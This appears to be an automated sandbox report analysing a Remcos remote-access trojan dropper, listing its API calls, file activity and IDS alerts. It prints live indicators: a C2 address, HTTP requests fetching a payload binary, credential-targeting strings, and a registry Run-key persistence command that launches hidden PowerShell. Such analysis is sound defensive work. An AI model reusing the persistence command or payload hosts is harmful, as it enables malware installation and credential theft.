Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_00402862 FindFirstFileW
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_0040658F FindFirstFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_232310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23236580 FindFirstFileExA
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\euthanasic\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49982 -> 107.173.4.16:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49984 -> 107.173.4.16:2404
Source: Malware configuration extractor | URLs: 107.173.4.16
Source: global traffic | TCP traffic: 192.168.2.10:49982 -> 107.173.4.16:2404
Source: global traffic | HTTP traffic detected:
    GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 185.26.107.57
Source: Joe Sandbox View | IP Address: 107.173.4.16
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49980 -> 185.26.107.57:80
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49983 -> 178.237.33.50:80
Source: global traffic | HTTP traffic detected:
    GET /CubBVEODo227.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: cmgtrading.eu
    Connection: Keep-Alive
    Cookie: SERVID=A
Source: global traffic | HTTP traffic detected:
    GET /CubBVEODo227.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: cmgtrading.eu
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 107.173.4.16 (this entry is repeated 50 times in the report; the C2 address is hard-coded in the configuration, so no DNS lookup precedes the connections)
Source: wabmig.exe, 00000011.00000003.2456199398.0000000002F29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wabmig.exe, 00000011.00000003.2456199398.0000000002F29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
Source: wabmig.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wabmig.exe, 0000000C.00000002.3773226942.0000000023A70000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wabmig.exe, 0000000C.00000002.3773226942.0000000023A70000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: cmgtrading.eu
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhvB258.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhvB258.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/CubBVEODo227.bin
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/CubBVEODo227.binzRZs
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/CubBVEODo227.bin~
            Source: bhvB258.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvB258.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhvB258.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
            Source: wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
            Source: wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe, SecuriteInfo.com.FileRepMalware.12793.28433.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhvB258.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
            Source: wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: wabmig.exe, 00000011.00000002.2457021842.0000000002AE4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/=
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/CubBVEODo227.bin
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/CubBVEODo227.binc
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/k
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000011.00000003.2456199398.0000000002F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wabmig.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownHTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.10:49981 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004053EF
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_0040987A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_00406DFC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_00406E9F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004068B5
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_004072B5

            E-Banking Fraud

            Source: Yara match | File source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004016FD NtdllDefWindowProc_A,18_2_004016FD
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004017B7 NtdllDefWindowProc_A,18_2_004017B7
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040333D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | File created: C:\Windows\Fonts\Urim.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_00406956 5_2_00406956
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_00404C2C 5_2_00404C2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04A3EAE0 7_2_04A3EAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04A3F3B0 7_2_04A3F3B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04A3E798 7_2_04A3E798
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_078CC93E 7_2_078CC93E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23247194 12_2_23247194
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_2323B5C1 12_2_2323B5C1
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044B040 17_2_0044B040
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0043610D 17_2_0043610D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00447310 17_2_00447310
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044A490 17_2_0044A490
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0040755A 17_2_0040755A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0043C560 17_2_0043C560
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044B610 17_2_0044B610
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044D6C0 17_2_0044D6C0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_004476F0 17_2_004476F0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044B870 17_2_0044B870
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044081D 17_2_0044081D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00414957 17_2_00414957
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_004079EE 17_2_004079EE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00407AEB 17_2_00407AEB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044AA80 17_2_0044AA80
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00412AA9 17_2_00412AA9
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00404B74 17_2_00404B74
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00404B03 17_2_00404B03
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0044BBD8 17_2_0044BBD8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00404BE5 17_2_00404BE5
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00404C76 17_2_00404C76
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00415CFE 17_2_00415CFE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00416D72 17_2_00416D72
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00446D30 17_2_00446D30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00446D8B 17_2_00446D8B
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00406E8F 17_2_00406E8F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00405038 18_2_00405038
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0041208C 18_2_0041208C
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004050A9 18_2_004050A9
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0040511A 18_2_0040511A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0043C13A 18_2_0043C13A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004051AB 18_2_004051AB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00449300 18_2_00449300
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0040D322 18_2_0040D322
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0044A4F0 18_2_0044A4F0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0043A5AB 18_2_0043A5AB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00413631 18_2_00413631
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00446690 18_2_00446690
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0044A730 18_2_0044A730
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004398D8 18_2_004398D8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_004498E0 18_2_004498E0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0044A886 18_2_0044A886
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0043DA09 18_2_0043DA09
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00438D5E 18_2_00438D5E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00449ED0 18_2_00449ED0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_0041FE83 18_2_0041FE83
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00430F54 18_2_00430F54
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_004050C2 19_2_004050C2
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_004014AB 19_2_004014AB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00405133 19_2_00405133
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_004051A4 19_2_004051A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00401246 19_2_00401246
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_0040CA46 19_2_0040CA46
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00405235 19_2_00405235
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_004032C8 19_2_004032C8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00401689 19_2_00401689
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00402F60 19_2_00402F60
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 004169A7 appears 86 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 0044DB70 appears 41 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 004165FF appears 35 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 00422297 appears 42 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 00444B5A appears 37 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 00413025 appears 78 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: String function: 00416760 appears 69 times
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe | Static PE information: invalid certificate
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/14@2/3
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,17_2_004182CE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040333D
